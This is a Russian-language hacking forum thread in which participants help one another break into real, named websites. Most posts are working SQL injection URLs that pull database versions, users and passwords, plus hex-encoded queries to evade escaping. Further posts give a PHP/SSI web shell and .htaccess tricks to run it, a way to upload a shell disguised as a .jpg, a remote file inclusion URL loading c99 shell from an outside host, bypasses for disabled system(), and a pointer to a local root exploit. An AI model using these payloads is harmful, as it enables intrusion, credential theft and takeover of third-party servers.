http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,ve rsion(),4,5,6,7/*
выдаёт ошибку
как надо сделать ?

короче нашёл :)

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),6,7/*

работает, что я могу дальше ?

nicusor version() ?

nicusor version() ?
mysql : 4.1.14

mysql : 4.1.14
можно таблицы подобрать. руками или моим скриптом/прогой от SQL

Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )

Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )
я не понял, тебе нужен подбор таблиц или количества выводимых полей?

перебор таблиц и колонок м мс скуля сервер:РР.Руками заебалсо уже.И ещё вот при отображении вывелась ошибка :

ADODB.Field ошибка '800a0bcd'

BOF èëè EOF èìååò çíà÷åíèå True, ëèáî òåêóùàÿ çàïèñü óäàëåíà. Äëÿ âûïîëíÿåìîé îïåðàöèè òðåáóåòñÿ òåêóùàÿ çàïèñü.

/item.asp, line 13

EOF обозначает конец файла как я помню, а что тут нипонятно)).Ещё и каракули стоят)).Есь какой-нить способ обойти кодировку,а то аес не пашет )

прочитал вот,и узнал,что эт знач юзера удалили))).Но пароль егр почему-то есть,а юзерид и ид_юзер выдают эту ошибку с концом файла)).И чтойто значит?

мм, это значит, что по твоему sql запросу не получено не каких данных, насчет аес? это T-SQL, там нет aes_decrypt

Че делать то.....логина нет,а пароль есь? гггг))

Бля почему бенчмарком не задосить серв ?

И ещё вопрос: как тут обойти фильтрацию ? перепробывал уже всё,но даже ошибку при запросе к мускулу выдаёт одну и ту же.

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,char(117),char(115),char(114 ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&lng=en

Удалось вывести только юзера, базу и версию(4.1 кстати).Пробывал и чар, и юрлкодирвоание,и аес, хекс - по нулям )(. Мошь есть у кого варианты что делать тут ?)

может я конечно ошибаюсь. но....

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+users+limit+1, 1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en

абалдеть.....как я так мимо пройти мог ппц:Р.Ничё бля не закодировано, а выдаёт какую-то левую ошибку.)(

Велемир, только твой мат удерживает от того, чтобы добавить тебе репутацию.

может я конечно ошибаюсь. но....

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+users+limit+1, 1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en


А к чему &lng=en, у тебя стоит коментарий /* и все что после него пишеться будет просто опускаться.

просто я от ссылки Велемир-а отталкивался.



http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=ru

сравни эти две ссылки поменял токо окончание с en на ru.
после /* опускаются как ты сказал, все в запросе mysql. но не как не все параметры GET.

Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.

Гы)))) Ну без мата не могуЮ такая моя пошлая натура сложилась :Р(.Мя позабавило то, что там обрезается длина вывода ))).Субстринг решает:)

Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.
аля пхп вроде так)
<?
system(pwd);
?>

ну или system(dir) если винда, вроде так)

Привет всем :)

Помогите пожалуйста разобраться,,, вот есть сайт:

www.fasie.ru/index.php?rid=120'

Немогу понять что нужно дальше делать :(

Если я не ошибаюсь нужно вводить:

www.fasie.ru/index.php?rid=-120+union+select+null,null,null*/

Но ошибки всё вылезают и вылезают:


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 63

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/content.inc.php on line 185

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 138


Пробовал делать так:

www.fasie.ru/index.php?rid=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27 ((и тд.....))*/

Теже ошибки......нужно до бесконечности перебирать эти значения ???

Помогите пожалуйста :(

там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..

Поднятие прав

Имеются 2 шелла, нужно поднять права до рута

1) uid=48(apache) gid=48(apache) groups=48(apache),100(users)
Linux zeus 2.6.18-8.1.4.el5 #1 SMP Thu May 17 03:26:03 EDT 2007 i686 i686 i386 GNU/Linux

2) uid=768443(site) gid=203435(pg587717) groups=203435(pg587717)
Linux nerds 2.4.32-grsec+f6b+gr217+nfs+a32+fuse23+tg+++opt+c8+gr2b-v6.194 #1 SMP Tue Jun 6 15:52:09 PDT 2006 i686 GNU/Linux

Help.

TheSoul 2ое врядли, во первых gr secured, во вторых однно из последних 2.;.* ветки

а первое сопкойно рутается http://milw0rm.com/exploits/5092

там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..

вывод есть как я понял только если использовать двойной запрос, т.е. внутри этого запроса использовать еще один запрос, все неудобство в том, что кавычки экранируются, и приходится этот второй запрос переводить в hex вобщем вот:
http://www.fasie.ru/index.php?rid=120+union+select+0x2D3120756E696F6E2 073656C65637420312C322C76657273696F6E28292C342C352 C362C372C382C392C31302C31312C3132+limit+1,1/*
видим в заголовке страницы версию

фактически запрос выглядит так:
120 union select '-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12' limit 1,1/*

аля пхп вроде так)
<?
system(pwd);
?>

ну или system(dir) если винда, вроде так)
Warning: system() has been disabled for security reasons in /usr/home/sait/pwd.php on line 2

Функция зпрещена. Можно это обойти?

Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).

обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз

Ershik, ещё есть passthru, exec, shell_exec, popen

обратный апостроф это в перле =\
print `uname`

Ershik, ещё есть passthru, exec, shell_exec, popen
врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php

обратные ковычки равноценны shell_exec()

ещё есть pcntl_exec и proc_open

+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)

Все нужно по типу:
<?
system(proc_open);
?>
так и делал. Все запрещено..

омг

если можешь менять файл можешь через ccи попытатся
https://forum.antichat.ru/showpost.php?p=568232&postcount=9

я написал себе этот маленкий шелл для этого

<?php
if ($handle = @fopen("./a.shtml", 'w'))
{ @fwrite($handle, '<!--#exec cmd="'.$_POST['a'].'"-->'); }
echo '<form name="a" method="post" action="">
<textarea name="textarea" id="textarea" cols="121" rows="24"> ';
@include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
echo ' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
?>

Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.

омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда

Народ, знает кто, где мона потренирвоаться с заливкой шеллов ? :Р

на локалхосте

Как залить шелл в Wordpress ?!

Как залить шелл в Wordpress ?!
если есть доступ к админке, то отредактировать нужную страницу. system(); etc

есть, пробывал Fetal Error или File edited successfully. и потом выплняю
http://www.site.com/wp-admin/plugin-editor.php?file=get-recent-comments/get-recent-comments.php?cmd=ls пишет Sorry, that file cannot be edited. хотя файл сохранён

я как-то заливал так. в .htaccess дописывал
AddHandler application/x-httpd-php .jpg
ищел в добовление новости, там было загрузить картинку, банально лил шелл с окончание jpg и все)

Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.

я забыл добавить .. так как на моём хосте всё в конфиге апача написано

Надо создать файл .htaccess
с содержанием

AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Include

дальше можешь запустить скрипт который я написал выше
или же создать файл с расширением .shtml и написать в нём
<!--#exec cmd="ls -la"--> где ls -la команда которую ты хочешь выполнить на сервере

и открыть его на сервере. пример www.site.ru/a.shtml

http://www.kat.kg/?file=[url] , что с етого можно поиметь ? :confused:

это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php

http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database( ),user(),version()),0x71),0x71),6,7/*


что можно ещё нарыть ?

nicusor
Там восемь столбцов
_http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (user(),char(58),version(),char(58),database()),0x 71),0x71),4,5,6,7,8/*
agro@localhost:4.1.14:moldagrotehnica_md
Подбирай таблицы если надо